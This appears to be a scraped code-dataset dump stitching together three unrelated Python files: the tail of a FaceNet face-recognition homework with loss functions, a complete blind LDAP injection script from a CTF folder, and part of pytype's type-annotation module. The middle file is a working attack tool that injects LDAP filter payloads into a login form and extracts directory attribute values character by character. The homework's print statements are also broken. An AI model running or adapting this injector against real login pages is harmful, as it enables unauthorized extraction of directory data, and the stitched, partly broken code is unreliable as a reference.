Load images and extract faces for all images in a directory
Inputs:
- directory: path of a directory which has same person's face
Returns:
- face: list of face array
"""
faces = list()
for filename in listdir(directory):
path = directory + filename
face = extract_face(path)
faces.append(face)
return faces
def load_dataset(directory):
"""
Load a dataset that contains one subdir for each class that in turn contains images
Inputs:
- directory: path of a directory which has all the train data or test data
Returns:
- asarray(X): face image array
- asarray(y): class label array
"""
X, y = list(), list()
for subdir in listdir(directory):
path = directory + subdir + '/'
if not isdir(path):
continue
if subdir.startswith('.'):
continue
faces = load_faces(path)
labels = [subdir for _ in range(len(faces))]
X.extend(faces)
y.extend(labels)
return asarray(X), asarray(y)
def get_embedding(model, face_pixels):
"""
Get the face embedding for one face
Inputs:
- model: facenet model which output 128-dim embedding
- face_pixels: image array of a face
Returns:
- yhat[0]: embedding of a face
"""
face_pixels = face_pixels.astype('float32')
mean, std = face_pixels.mean(), face_pixels.std()
face_pixels = (face_pixels - mean) / std
samples = expand_dims(face_pixels, axis=0)
yhat = model.predict(samples)
return yhat[0]
def contrastive_loss(y, emb1, emb2, margin=1.0):
"""
Compute the contrastive loss for two embeddings
Inputs:
- y: value of 1 if emb1 and emb2 are same person's face, 0 if not
- emb1: embedding of a face
- emb2: embedding of a face
Returns:
- loss
"""
#### Question (b): your implementation starts here (don't delete this line)
print(emb1.shape, emb2.shape)
y_pred = tf.linalg.norm(emb1 - emb2)
y = tf.cast(y, y_pred.dtype)
loss = y * tf.math.square(y_pred) + (1.0 - y) * tf.math.square(
tf.math.maximum(margin - y_pred, 0.0)
)
#### Question (b): your implementation ends here (don't delete this line)
return loss
def triplet_loss(anchor, emb1, emb2, margin=1.0):
"""
Compute the contrastive loss for two embeddings
Inputs:
- anchor: embedding of a face which to be the standard
- emb1: embedding of a positive face
- emb2: embedding of a negative face
Returns:
- loss
"""
#### Question (c): your implementation starts here (don't delete this line)
d_pos = tf.reduce_sum(tf.square(anchor - emb1))
d_neg = tf.reduce_sum(tf.square(anchor - emb2))
loss = tf.maximum(0., margin + d_pos - d_neg)
loss = tf.reduce_mean(loss)
#### Question (c): your implementation ends here (don't delete this line)
return loss
def main():
# load train dataset
trainX, trainy = load_dataset('./LFW/train/')
print(trainX.shape, trainy.shape)
# load test dataset
testX, testy = load_dataset('./LFW/val/')
print(testX.shape, testy.shape)
# load the pre-trained facenet model
model = load_model('facenet_keras.h5', compile=False)
# convert each face in the train set to an embedding
print('[INFO] calculating train data embedding ...')
newTrainX = list()
for face_pixels in tqdm(trainX):
embedding = get_embedding(model, face_pixels)
newTrainX.append(embedding)
trainX = asarray(newTrainX)
# convert each face in the test set to an embedding
print('[INFO] calculating test data embedding ...')
newTestX = list()
for face_pixels in tqdm(testX):
embedding = get_embedding(model, face_pixels)
newTestX.append(embedding)
testX = asarray(newTestX)
# normalize input vectors
in_encoder = Normalizer(norm='l2')
trainX = in_encoder.transform(trainX)
testX = in_encoder.transform(testX)
# label encode targets
out_encoder = LabelEncoder()
out_encoder.fit(trainy)
trainy = out_encoder.transform(trainy)
testy = out_encoder.transform(testy)
'''
Generate linear classifier model which name is 'model'
'''
#### Question (a): your implementation starts here (don't delete this line)
model = SVC(gamma='auto', verbose=True)
#### Question (a): your implementation ends here (don't delete this line)
# train
print('[INFO] model is training ...')
model.fit(trainX, trainy)
print('[INFO] training is done.')
# predict
yhat_train = model.predict(trainX)
yhat_test = model.predict(testX)
# score
score_train = accuracy_score(trainy, yhat_train)
score_test = accuracy_score(testy, yhat_test)
# summarize
print('Accuracy: train=%.3f, test=%.3f' % (score_train*100, score_test*100))
#loss function test with sample data
print('Contrastive loss for same face: f' % (contrastive_loss(1,trainX[0], trainX[1])))
print('Contrastive loss for different face: f' % (contrastive_loss(0,trainX[0], trainX[100])))
print('Triplet loss: f' % (triplet_loss(trainX[0], trainX[0], trainX[100])))
if __name__ == '__main__':
main()
| vgthengane/pytorch-cv-models | h4_face.py | h4_face.py | py | 6,258 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image.open",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "numpy.asarray",
"line_num... |
7004766354 | #!/usr/bin/python
from bs4 import BeautifulSoup
import requests
import time
import sys
import urllib
from itertools import chain
import argparse
url = "http://10.10.10.122/login.php"
startUrl = "http://10.10.10.122/"
proxyValues = {'http': 'http://127.0.0.1:8080'}
SLEEP_VALUE = 3
lower_letters = range(97,123)
upper_letters = range(65,91)
number_set = range(48,58)
#r= requests.get(url)
#sessionCookie = r.cookies
#print (r.text)
testRange = range(107,109)
#print ("*** Sleeping for %d seconds***" % SLEEPVALUE)
#time.sleep(SLEEPVALUE) #sleep little baby
def findLDAPAttribute(sessionID, lineList, pl,fullRange):
failedList = []
foundAttributeDict = {}
foundAttribute = ''
foundValue =''
#fullRange = chain(lower_letters)
headerValues = {'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept' :'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://10.10.10.122/login.php',
'Connection': 'close'}
#iterate through attributes
for i in lineList:
token = ''
#payload = 'ldapuser)(|(' + i +'=*)'
#payload = pre + i + post
giveUp = False;
fullIteration = 0
while (giveUp!= True):
fullIteration=len(token)
for character in fullRange:
payload = pl.format(i,token+chr(character)+'*')
#double url encoding is needed
print ("trying payload %s" % payload)
payload = urllib.parse.quote_plus(payload)
reqdata = {'inputUsername' : payload, 'inputOTP': '123456'}
with requests.session() as s:
try:
s.keep_alive = False
r = s.post(url,cookies={'PHPSESSID':sessionID}, data=reqdata, headers=headerValues, proxies=proxyValues)
#non proxy -
#r = s.post(url,cookies={'PHPSESSID':sessionID}, data=reqdata, headers=headerValues)
except Exception as e:
print(repr(e))
failedList.append(i)
finally:
s.close()
#looking for result
soup = BeautifulSoup(r.text, 'html.parser')
resultSet = soup.findAll( "div", {"class":"col-sm-10"})
if len(resultSet[0].text) > 1:
#if we end up with the failed double url decoding in result, then we need to ignore it
if "%" not in resultSet[0].text:
#"Cannot login" is the indicator for the blind injection
#add the current character to our token
token += chr(character)
print ("Found a value in attribute %s of value %s" % (i,token))
foundAttribute = i
foundValue = resultSet[0].text
else:
print ("no value for %s on length %d with length %d" % (i,len(resultSet[0].text), len(r.text) ))
time.sleep(SLEEP_VALUE)
#if the length of the token has not increased, then we're out of options..
if (len(token) == fullIteration):
giveUp=True #move to the next attribute
print ("We are at %s" %token)
if len(token) > 0:
foundAttributeDict.update({foundAttribute:token})
print ("All done! values are %s : %s" % (foundAttribute,token))
finalVal = "Attribute is [" + foundAttribute + "] with value [" + token +"]"
if len (failedList) > 0:
print ("We failed on attributes " + str(failedList))
for keys,value in foundAttributeDict.items():
print (keys, value)
return foundAttributeDict
def main():
parser = argparse.ArgumentParser(description='blind ldap injector')
parser.add_argument('--option', '-o', help = "1-Upper,2-Lower,3-Numbers,4-LowerNumbers,5-all", required=True, choices={1,2,3,4,5}, type=int)
parser.add_argument('--attribFile', '-f', help = "attribute file", required=True)
parser.add_argument('--sessionID', '-s', help = "phpsession id", required= True)
args = parser.parse_args()
sessionID = args.sessionID
filename = args.attribFile
options = args.option
#filename = sys.argv[1]
with open (filename,'r') as f:
#lineList = f.readlines()
lineList = [line.rstrip() for line in f]
#sessionID = 'e3i2o514r6ltme1cno3skji8s7'
print ("Starting with SessionID %s Filename %s Option - %d" % (sessionID,filename,options))
fullRange = ''
if options == 1: fullRange = upper_letters
elif options == 2: fullRange =lower_letters
elif options==3: fullRange = number_set
elif options==4: fullRange =chain(lower_letters,number_set)
elif options==5: fullRange = chain(upper_letters,lower_letters,number_set)
print (fullRange)
#testcase = findLDAPAttribute(sessionID,lineList,'*)(','=ldapuser)')
#print (testcase)
#lets look for attributes based on the payload *)
payload = '*)({0}={1}'
testcase = findLDAPAttribute(sessionID,lineList,payload,fullRange)
# print (foundAttributeDict)
payload = 'ldapuser)({0}={1}'
testcase =findLDAPAttribute(sessionID,lineList,payload,fullRange)
#this test case works - can get "CANNOT LOGIN" for cn=ldauser*
#testcase = findLDAPAttribute(sessionID,lineList,'*)(','=ldapuse*')
#print (testcase)
if __name__ == '__main__':
sys.exit(main())
#print ("Message is of length %d and is [%s]" % (len(resultSet[0].text), resultSet[0].text))
#print (r.text)
| nutty-guineapig/htb-pub | CTF/blindLDAPInjector.py | blindLDAPInjector.py | py | 5,035 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.parse.quote_plus",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "urllib.parse",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "requests.session",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "bs4.Beauti... |
28890288771 | """Constructs related to type annotations."""
import dataclasses
import logging
import typing
from typing import Mapping, Optional, Set, Tuple, Type, Union as _Union
from pytype import datatypes
from pytype.abstract import _base
from pytype.abstract import _classes
from pytype.abstract import _instance_base
from pytype.abstract import abstract_utils
from pytype.abstract import function
from pytype.abstract import mixin
from pytype.pytd import pytd_utils
log = logging.getLogger(__name__)
def _get_container_type_key(container):
try:
return container.get_type_key()
except AttributeError:
return container
class AnnotationClass(_instance_base.SimpleValue, mixin.HasSlots):
"""Base class of annotations that can be parameterized."""
def __init__(self, name, ctx):
super().__init__(name, ctx)
mixin.HasSlots.init_mixin(self)
self.set_native_slot("__getitem__", self.getitem_slot)
def getitem_slot(self, node, slice_var):
"""Custom __getitem__ implementation."""
slice_content = abstract_utils.maybe_extract_tuple(slice_var)
inner, ellipses = self._build_inner(slice_content)
value = self._build_value(node, tuple(inner), ellipses)
return node, value.to_variable(node)
def _build_inner(self, slice_content):
"""Build the list of parameters.
Args:
slice_content: The iterable of variables to extract parameters from.
Returns:
A tuple of a list of parameters and a set of indices at which an ellipsis
was replaced with Any.
"""
inner = []
ellipses = set()
for var in slice_content:
if len(var.bindings) > 1:
self.ctx.errorlog.ambiguous_annotation(self.ctx.vm.frames, var.data)
inner.append(self.ctx.convert.unsolvable)
else:
val = var.bindings[0].data
if val is self.ctx.convert.ellipsis:
# Ellipses are allowed only in special cases, so turn them into Any
# but record the indices so we can check if they're legal.
ellipses.add(len(inner))
inner.append(self.ctx.convert.unsolvable)
else:
inner.append(val)
return inner, ellipses
def _build_value(self, node, inner, ellipses):
raise NotImplementedError(self.__class__.__name__)
def __repr__(self):
return f"AnnotationClass({self.name})"
def _get_class(self):
return self.ctx.convert.type_type
class AnnotationContainer(AnnotationClass):
"""Implementation of X[...] for annotations."""
def __init__(self, name, ctx, base_cls):
super().__init__(name, ctx)
self.base_cls = base_cls
def __repr__(self):
return f"AnnotationContainer({self.name})"
def _sub_annotation(
self, annot: _base.BaseValue, subst: Mapping[str, _base.BaseValue],
seen: Optional[Set[_base.BaseValue]] = None,
) -> _base.BaseValue:
"""Apply type parameter substitutions to an annotation."""
# This is very similar to annotation_utils.sub_one_annotation, but a couple
# differences make it more convenient to maintain two separate methods:
# - subst here is a str->BaseValue mapping rather than str->Variable, and it
# would be wasteful to create variables just to match sub_one_annotation's
# expected input type.
# - subst contains the type to be substituted in, not an instance of it.
# Again, instantiating the type just to later get the type of the instance
# is unnecessary extra work.
if seen is None:
seen = set()
if annot in seen:
return annot.ctx.convert.unsolvable
seen = seen | {annot}
if isinstance(annot, TypeParameter):
if annot.full_name in subst:
return subst[annot.full_name]
else:
return self.ctx.convert.unsolvable
elif isinstance(annot, mixin.NestedAnnotation):
inner_types = [(key, self._sub_annotation(val, subst, seen))
for key, val in annot.get_inner_types()]
return annot.replace(inner_types)
return annot
def _get_value_info(
self, inner, ellipses, allowed_ellipses=frozenset()
) -> Tuple[Tuple[_Union[int, str], ...], Tuple[_base.BaseValue, ...],
Type[_classes.ParameterizedClass]]:
"""Get information about the container's inner values.
Args:
inner: The list of parameters from _build_inner().
ellipses: The set of ellipsis indices from _build_inner().
allowed_ellipses: Optionally, a set of indices at which ellipses are
allowed. If omitted, ellipses are assumed to be never allowed.
Returns:
A tuple of the template, the parameters, and the container class.
"""
if self.base_cls.full_name == "typing.Protocol":
return abstract_utils.build_generic_template(inner, self) + (
_classes.ParameterizedClass,) # pytype: disable=bad-return-type
if isinstance(self.base_cls, _classes.TupleClass):
template = tuple(range(self.base_cls.tuple_length))
elif isinstance(self.base_cls, _classes.CallableClass):
template = tuple(range(self.base_cls.num_args)) + (abstract_utils.RET,)
else:
template = tuple(t.name for t in self.base_cls.template)
self.ctx.errorlog.invalid_ellipses(self.ctx.vm.frames,
ellipses - allowed_ellipses, self.name)
last_index = len(inner) - 1
if last_index and last_index in ellipses and len(inner) > len(template):
# Even if an ellipsis is not allowed at this position, strip it off so
# that we report only one error for something like 'List[int, ...]'
inner = inner[:-1]
if isinstance(self.base_cls, _classes.ParameterizedClass):
# We're dealing with a generic type alias, e.g.:
# X = Dict[T, str]
# def f(x: X[int]): ...
# We construct `inner` using both the new inner values and the ones
# already in X, to end up with a final result of:
# template=(_K, _V)
# inner=(int, str)
new_inner = []
inner_idx = 0
subst = {}
# Note that we ignore any missing or extra values in inner for now; the
# problem will be reported later by _validate_inner.
for k in template:
v = self.base_cls.formal_type_parameters[k]
if v.formal:
params = self.ctx.annotation_utils.get_type_parameters(v)
for param in params:
# If there are too few parameters, we ignore the problem for now;
# it'll be reported when _build_value checks that the lengths of
# template and inner match.
if param.full_name not in subst and inner_idx < len(inner):
subst[param.full_name] = inner[inner_idx]
inner_idx += 1
new_inner.append(self._sub_annotation(v, subst))
else:
new_inner.append(v)
inner = tuple(new_inner)
if isinstance(self.base_cls, _classes.TupleClass):
template += (abstract_utils.T,)
inner += (self.ctx.convert.merge_values(inner),)
elif isinstance(self.base_cls, _classes.CallableClass):
template = template[:-1] + (abstract_utils.ARGS,) + template[-1:]
args = inner[:-1]
inner = args + (self.ctx.convert.merge_values(args),) + inner[-1:]
abstract_class = type(self.base_cls)
else:
abstract_class = _classes.ParameterizedClass
return template, inner, abstract_class
def _validate_inner(self, template, inner, raw_inner):
"""Check that the passed inner values are valid for the given template."""
if (isinstance(self.base_cls, _classes.ParameterizedClass) and
not abstract_utils.is_generic_protocol(self.base_cls)):
# For a generic type alias, we check that the number of typevars in the
# alias matches the number of raw parameters provided.
template_length = raw_template_length = len(
set(self.ctx.annotation_utils.get_type_parameters(self.base_cls)))
inner_length = len(raw_inner)
base_cls = self.base_cls.base_cls
else:
# In all other cases, we check that the final template length and
# parameter count match, after any adjustments like flattening the inner
# argument list in a Callable.
template_length = len(template)
raw_template_length = len(self.base_cls.template)
inner_length = len(inner)
base_cls = self.base_cls
if inner_length != template_length:
if not template:
self.ctx.errorlog.not_indexable(
self.ctx.vm.frames, base_cls.name, generic_warning=True)
else:
# Use the unprocessed values of `template` and `inner` so that the error
# message matches what the user sees.
if isinstance(self.base_cls, _classes.ParameterizedClass):
error_template = None
else:
error_template = (t.name for t in base_cls.template)
self.ctx.errorlog.wrong_annotation_parameter_count(
self.ctx.vm.frames, self.base_cls, raw_inner, raw_template_length,
error_template)
else:
if len(inner) == 1:
val, = inner
# It's a common mistake to index a container class rather than an
# instance (e.g., list[0]).
# We only check the "int" case, since string literals are allowed for
# late annotations.
if (isinstance(val, _instance_base.Instance) and
val.cls == self.ctx.convert.int_type):
# Don't report this error again.
inner = (self.ctx.convert.unsolvable,)
self.ctx.errorlog.not_indexable(self.ctx.vm.frames, self.name)
# Check for a misused Final annotation
if any(isinstance(val, FinalAnnotation) for val in inner):
self.ctx.errorlog.invalid_final_type(self.ctx.vm.frames)
inner = [val.annotation if isinstance(val, FinalAnnotation) else val
for val in inner]
return inner
def _build_value(self, node, inner, ellipses):
if self.base_cls.is_late_annotation():
# A parameterized LateAnnotation should be converted to another
# LateAnnotation to delay evaluation until the first late annotation is
# resolved. We don't want to create a ParameterizedClass immediately
# because (1) ParameterizedClass expects its base_cls to be a
# class_mixin.Class, and (2) we have to postpone error-checking anyway so
# we might as well postpone the entire evaluation.
printed_params = []
added_typing_imports = set()
for i, param in enumerate(inner):
if i in ellipses:
printed_params.append("...")
else:
typ = param.get_instance_type(node)
annot, typing_imports = pytd_utils.MakeTypeAnnotation(typ)
printed_params.append(annot)
added_typing_imports.update(typing_imports)
expr = f"{self.base_cls.expr}[{', '.join(printed_params)}]"
annot = LateAnnotation(expr, self.base_cls.stack, self.ctx,
typing_imports=added_typing_imports)
self.ctx.vm.late_annotations[self.base_cls.expr].append(annot)
return annot
template, processed_inner, abstract_class = self._get_value_info(
inner, ellipses)
if isinstance(self.base_cls, _classes.ParameterizedClass):
base_cls = self.base_cls.base_cls
else:
base_cls = self.base_cls
if base_cls.full_name in ("typing.Generic", "typing.Protocol"):
# Generic is unique in that parameterizing it defines a new template;
# usually, the parameterized class inherits the base class's template.
# Protocol[T, ...] is a shorthand for Protocol, Generic[T, ...].
template_params = [
param.with_scope(base_cls.full_name)
for param in typing.cast(Tuple[TypeParameter, ...], processed_inner)]
else:
template_params = None
processed_inner = self._validate_inner(template, processed_inner, inner)
params = {
name: (processed_inner[i]
if i < len(processed_inner) else self.ctx.convert.unsolvable)
for i, name in enumerate(template)
}
# Check if the concrete types match the type parameters.
if base_cls.template:
processed_params = self.ctx.annotation_utils.convert_class_annotations(
node, params)
for formal_param in base_cls.template:
root_node = self.ctx.root_node
param_value = processed_params[formal_param.name]
if (isinstance(formal_param, TypeParameter) and
not formal_param.is_generic() and
isinstance(param_value, TypeParameter)):
if formal_param.name == param_value.name:
# We don't need to check if a TypeParameter matches itself.
continue
else:
actual = param_value.instantiate(
root_node, container=abstract_utils.DUMMY_CONTAINER)
elif param_value.is_concrete and isinstance(param_value.pyval, str):
expr = param_value.pyval
annot = LateAnnotation(expr, self.ctx.vm.frames, self.ctx)
base = expr.split("[", 1)[0]
self.ctx.vm.late_annotations[base].append(annot)
actual = annot.instantiate(root_node)
else:
actual = param_value.instantiate(root_node)
match_result = self.ctx.matcher(node).compute_one_match(
actual, formal_param)
if not match_result.success:
if isinstance(param_value, TypeParameter):
# bad_matches replaces type parameters in the expected type with
# their concrete values, which is usually what we want. But when the
# actual type is a type parameter, then it's more helpful to show
# the expected type as a type parameter as well.
bad = []
for match in match_result.bad_matches:
expected = dataclasses.replace(match.expected, typ=formal_param)
bad.append(dataclasses.replace(match, expected=expected))
if isinstance(formal_param, TypeParameter):
details = (f"TypeVars {formal_param.name} and {param_value.name} "
"have incompatible bounds or constraints.")
else:
details = None
else:
bad = match_result.bad_matches
details = None
self.ctx.errorlog.bad_concrete_type(
self.ctx.vm.frames, root_node, bad, details)
return self.ctx.convert.unsolvable
try:
return abstract_class(base_cls, params, self.ctx, template_params)
except abstract_utils.GenericTypeError as e:
self.ctx.errorlog.invalid_annotation(self.ctx.vm.frames, e.annot, e.error)
return self.ctx.convert.unsolvable
def call(self, node, func, args, alias_map=None):
return self._call_helper(node, self.base_cls, func, args)
class _TypeVariableInstance(_base.BaseValue):
"""An instance of a type parameter."""
def __init__(self, param, instance, ctx):
super().__init__(param.name, ctx)
self.cls = self.param = param
self.instance = instance
self.scope = param.scope
@property
def full_name(self):
return f"{self.scope}.{self.name}" if self.scope else self.name
def call(self, node, func, args, alias_map=None):
var = self.instance.get_instance_type_parameter(self.name)
if var.bindings:
return function.call_function(self.ctx, node, var, args)
else:
return node, self.ctx.convert.empty.to_variable(self.ctx.root_node)
def __eq__(self, other):
if isinstance(other, type(self)):
return self.param == other.param and self.instance == other.instance
return NotImplemented
def __hash__(self):
return hash((self.param, self.instance))
def __repr__(self):
return f"{self.__class__.__name__}({self.name!r})"
class TypeParameterInstance(_TypeVariableInstance):
"""An instance of a TypeVar type parameter."""
class ParamSpecInstance(_TypeVariableInstance):
"""An instance of a ParamSpec type parameter."""
class _TypeVariable(_base.BaseValue):
"""Parameter of a type."""
formal = True
_INSTANCE_CLASS: Type[_TypeVariableInstance] = None
def __init__(self,
name,
ctx,
constraints=(),
bound=None,
covariant=False,
contravariant=False,
scope=None):
super().__init__(name, ctx)
# TODO(b/217789659): PEP-612 does not mention constraints, but ParamSpecs
# ignore all the extra parameters anyway..
self.constraints = constraints
self.bound = bound
self.covariant = covariant
self.contravariant = contravariant
self.scope = scope
@_base.BaseValue.module.setter
def module(self, module):
super(_TypeVariable, _TypeVariable).module.fset(self, module)
self.scope = module
@property
def full_name(self):
return f"{self.scope}.{self.name}" if self.scope else self.name
def is_generic(self):
return not self.constraints and not self.bound
def copy(self):
return self.__class__(self.name, self.ctx, self.constraints, self.bound,
self.covariant, self.contravariant, self.scope)
def with_scope(self, scope):
res = self.copy()
res.scope = scope
return res
def __eq__(self, other):
if isinstance(other, type(self)):
return (self.name == other.name and
self.constraints == other.constraints and
self.bound == other.bound and
self.covariant == other.covariant and
self.contravariant == other.contravariant and
self.scope == other.scope)
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash((self.name, self.constraints, self.bound, self.covariant,
self.contravariant))
def __repr__(self):
return ("{!s}({!r}, constraints={!r}, bound={!r}, module={!r})"
.format(self.__class__.__name__, self.name, self.constraints,
self.bound, self.scope))
def instantiate(self, node, container=None):
var = self.ctx.program.NewVariable()
if container and (not isinstance(container, _instance_base.SimpleValue) or
self.full_name in container.all_template_names):
instance = self._INSTANCE_CLASS(self, container, self.ctx) # pylint: disable=not-callable
return instance.to_variable(node)
else:
for c in self.constraints:
var.PasteVariable(c.instantiate(node, container))
if self.bound:
var.PasteVariable(self.bound.instantiate(node, container))
if not var.bindings:
var.AddBinding(self.ctx.convert.unsolvable, [], node)
return var
def update_official_name(self, name):
if self.name != name:
message = (f"TypeVar({self.name!r}) must be stored as {self.name!r}, "
f"not {name!r}")
self.ctx.errorlog.invalid_typevar(self.ctx.vm.frames, message)
def call(self, node, func, args, alias_map=None):
return node, self.instantiate(node)
class TypeParameter(_TypeVariable):
"""Parameter of a type (typing.TypeVar)."""
_INSTANCE_CLASS = TypeParameterInstance
class ParamSpec(_TypeVariable):
"""Parameter of a callable type (typing.ParamSpec)."""
_INSTANCE_CLASS = ParamSpecInstance
class ParamSpecArgs(_base.BaseValue):
"""ParamSpec.args."""
def __init__(self, paramspec, ctx):
super().__init__(f"{paramspec.name}.args", ctx)
self.paramspec = paramspec
def instantiate(self, node, container=None):
return self.to_variable(node)
class ParamSpecKwargs(_base.BaseValue):
"""ParamSpec.kwargs."""
def __init__(self, paramspec, ctx):
super().__init__(f"{paramspec.name}.kwargs", ctx)
self.paramspec = paramspec
def instantiate(self, node, container=None):
return self.to_variable(node)
class Concatenate(_base.BaseValue):
"""Concatenation of args and ParamSpec."""
def __init__(self, params, ctx):
super().__init__("Concatenate", ctx)
self.args = params[:-1]
self.paramspec = params[-1]
@property
def full_name(self):
return self.paramspec.full_name
def instantiate(self, node, container=None):
return self.to_variable(node)
@property
def num_args(self):
return len(self.args)
def get_args(self):
# Satisfies the same interface as abstract.CallableClass
return self.args
def __repr__(self):
args = ", ".join(list(map(repr, self.args)) + [self.paramspec.name])
return f"Concatenate[{args}]"
class Union(_base.BaseValue, mixin.NestedAnnotation, mixin.HasSlots):
"""A list of types.
Used for parameter matching.
Attributes:
options: Iterable of instances of BaseValue.
"""
def __init__(self, options, ctx):
super().__init__("Union", ctx)
assert options
self.options = list(options)
self.cls = self._get_class()
self._printing = False
self._instance_cache = {}
mixin.NestedAnnotation.init_mixin(self)
mixin.HasSlots.init_mixin(self)
self.set_native_slot("__getitem__", self.getitem_slot)
def __repr__(self):
if self._printing: # recursion detected
printed_contents = "..."
else:
self._printing = True
printed_contents = ", ".join(repr(o) for o in self.options)
self._printing = False
return f"{self.name}[{printed_contents}]"
def __eq__(self, other):
if isinstance(other, type(self)):
return self.options == other.options
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
# Use the names of the parameter values to approximate a hash, to avoid
# infinite recursion on recursive type annotations.
return hash(tuple(o.full_name for o in self.options))
def _unique_parameters(self):
return [o.to_variable(self.ctx.root_node) for o in self.options]
def _get_class(self):
classes = {o.cls for o in self.options}
if len(classes) > 1:
return self.ctx.convert.unsolvable
else:
return classes.pop()
def getitem_slot(self, node, slice_var):
"""Custom __getitem__ implementation."""
slice_content = abstract_utils.maybe_extract_tuple(slice_var)
params = self.ctx.annotation_utils.get_type_parameters(self)
num_params = len({x.name for x in params})
# Check that we are instantiating all the unbound type parameters
if num_params != len(slice_content):
self.ctx.errorlog.wrong_annotation_parameter_count(
self.ctx.vm.frames, self, [v.data[0] for v in slice_content],
num_params)
return node, self.ctx.new_unsolvable(node)
concrete = (
var.data[0].instantiate(node, container=abstract_utils.DUMMY_CONTAINER)
for var in slice_content)
subst = datatypes.AliasingDict()
for p in params:
for k in subst:
if k == p.name or k.endswith(f".{p.name}"):
subst.add_alias(p.full_name, k)
break
else:
subst[p.full_name] = next(concrete)
new = self.ctx.annotation_utils.sub_one_annotation(node, self, [subst])
return node, new.to_variable(node)
def instantiate(self, node, container=None):
var = self.ctx.program.NewVariable()
for option in self.options:
k = (node, _get_container_type_key(container), option)
if k in self._instance_cache:
if self._instance_cache[k] is None:
self._instance_cache[k] = self.ctx.new_unsolvable(node)
instance = self._instance_cache[k]
else:
self._instance_cache[k] = None
instance = option.instantiate(node, container)
self._instance_cache[k] = instance
var.PasteVariable(instance, node)
return var
def call(self, node, func, args, alias_map=None):
var = self.ctx.program.NewVariable(self.options, [], node)
return function.call_function(self.ctx, node, var, args)
def get_formal_type_parameter(self, t):
new_options = [option.get_formal_type_parameter(t)
for option in self.options]
return Union(new_options, self.ctx)
def get_inner_types(self):
return enumerate(self.options)
def update_inner_type(self, key, typ):
self.options[key] = typ
def replace(self, inner_types):
return self.__class__((v for _, v in sorted(inner_types)), self.ctx)
class LateAnnotation:
"""A late annotation.
A late annotation stores a string expression and a snapshot of the VM stack at
the point where the annotation was introduced. Once the expression is
resolved, the annotation pretends to be the resolved type; before that, it
pretends to be an unsolvable. This effect is achieved by delegating attribute
lookup with __getattribute__.
Note that for late annotation x, `isinstance(x, ...)` and `x.__class__` will
use the type that x is pretending to be; `type(x)` will reveal x's true type.
Use `x.is_late_annotation()` to check whether x is a late annotation.
"""
_RESOLVING = object()
def __init__(self, expr, stack, ctx, *, typing_imports=None):
self.expr = expr
self.stack = stack
self.ctx = ctx
self.resolved = False
# Any new typing imports the annotation needs while resolving.
self._typing_imports = typing_imports or set()
self._type = ctx.convert.unsolvable # the resolved type of `expr`
self._unresolved_instances = set()
self._resolved_instances = {}
# _attribute_names needs to be defined last! This contains the names of all
# of LateAnnotation's attributes, discovered by looking at
# LateAnnotation.__dict__ and self.__dict__. These names are used in
# __getattribute__ and __setattr__ to determine whether a given get/setattr
# call should operate on the LateAnnotation itself or its resolved type.
self._attribute_names = (
set(LateAnnotation.__dict__) |
set(super().__getattribute__("__dict__")))
def flatten_expr(self):
"""Flattens the expression into a legal variable name if necessary.
Pytype stores parameterized recursive types in intermediate variables. If
self is such a type, this method flattens self.expr into a string that can
serve as a variable name. For example, 'MyRecursiveAlias[int, str]' is
flattened into '_MyRecursiveAlias_LBAR_int_COMMA_str_RBAR'.
Returns:
If self is a parameterized recursive type, a flattened version of
self.expr that is a legal variable name. Otherwise, self.expr unchanged.
"""
if "[" in self.expr and self.is_recursive():
# _DOT and _RBAR have no trailing underscore because they precede names
# that we already prefix an underscore to.
return "_" + self.expr.replace(".", "_DOT").replace(
"[", "_LBAR_").replace("]", "_RBAR").replace(", ", "_COMMA_")
return self.expr
def unflatten_expr(self):
"""Unflattens a flattened expression."""
if "_LBAR_" in self.expr:
mod, dot, rest = self.expr.rpartition(".")
# The [1:] slicing and trailing underscore in _DOT_ are to get rid of
# leading underscores added when flattening.
return mod + dot + rest[1:].replace("_DOT_", ".").replace(
"_LBAR_", "[").replace("_RBAR", "]").replace("_COMMA_", ", ")
return self.expr
def __repr__(self):
return "LateAnnotation({!r}, resolved={!r})".format(
self.expr, self._type if self.resolved else None)
# __hash__ and __eq__ need to be explicitly defined for Python to use them in
# set/dict comparisons.
def __hash__(self):
return hash(self._type) if self.resolved else hash(self.expr)
def __eq__(self, other):
return hash(self) == hash(other)
def __getattribute__(self, name):
# We use super().__getattribute__ directly for attribute access to avoid a
# performance penalty from this function recursively calling itself.
get = super().__getattribute__
if name == "_attribute_names" or name in get("_attribute_names"):
return get(name)
return get("_type").__getattribute__(name) # pytype: disable=attribute-error
def __setattr__(self, name, value):
if not hasattr(self, "_attribute_names") or name in self._attribute_names:
return super().__setattr__(name, value)
return self._type.__setattr__(name, value)
def resolve(self, node, f_globals, f_locals):
"""Resolve the late annotation."""
if self.resolved:
return
# Sets resolved to a truthy value distinguishable from True so that
# 'if self.resolved' is True when self is partially resolved, but code that
# really needs to tell partially and fully resolved apart can do so.
self.resolved = LateAnnotation._RESOLVING
# Add implicit imports for typing, since we can have late annotations like
# `set[int]` which get converted to `typing.Set[int]`.
if self._typing_imports:
overlay = self.ctx.vm.import_module("typing", "typing", 0)
for v in self._typing_imports:
if v not in f_globals.members:
f_globals.members[v] = overlay.get_module(v).load_lazy_attribute(v)
var, errorlog = abstract_utils.eval_expr(self.ctx, node, f_globals,
f_locals, self.expr)
if errorlog:
self.ctx.errorlog.copy_from(errorlog.errors, self.stack)
self._type = self.ctx.annotation_utils.extract_annotation(
node, var, None, self.stack)
if self._type != self.ctx.convert.unsolvable:
# We may have tried to call __init__ on instances of this annotation.
# Since the annotation was unresolved at the time, we need to call
# __init__ again to define any instance attributes.
for instance in self._unresolved_instances:
if isinstance(instance.cls, Union):
# Having instance.cls be a Union type will crash in attribute.py.
